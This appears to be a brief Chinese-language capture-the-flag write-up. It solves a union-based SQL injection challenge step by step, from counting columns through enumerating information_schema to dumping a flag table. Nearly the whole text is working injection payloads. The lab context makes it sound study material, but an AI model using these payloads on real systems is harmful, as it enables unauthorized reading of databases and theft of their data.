题目:
查看网页发现参数为wllm
开始尝试sql注入
url?wllm=1
判断字段
url?wllm=1' order by 3--+
url?wllm=1' order by 4--+
3的时候正常回显,4的时候显示Unknown column ‘4’ in ‘order clause’,说明有3列数据
url?wllm=-1' union select 111,222,333--+
判断回显位在222处和333处
url?wllm=-1' union select 111,database(),version()--+
在回显位上,输入database和version查看数据库名和版本
url?wllm=-1' union select 111,222,group_concat(table_name) from information_schema.tables where table_schema = 'test_db'--+
显示出数据库test_db中所有的表名
url?wllm=-1' union select 111,222,group_concat(column_name) from information_schema.columns where table_name = 'test_tb'--+
查看test_tb表中的所有列
url?wllm=-1' union select 111,222,group_concat(id,flag) from test_tb--+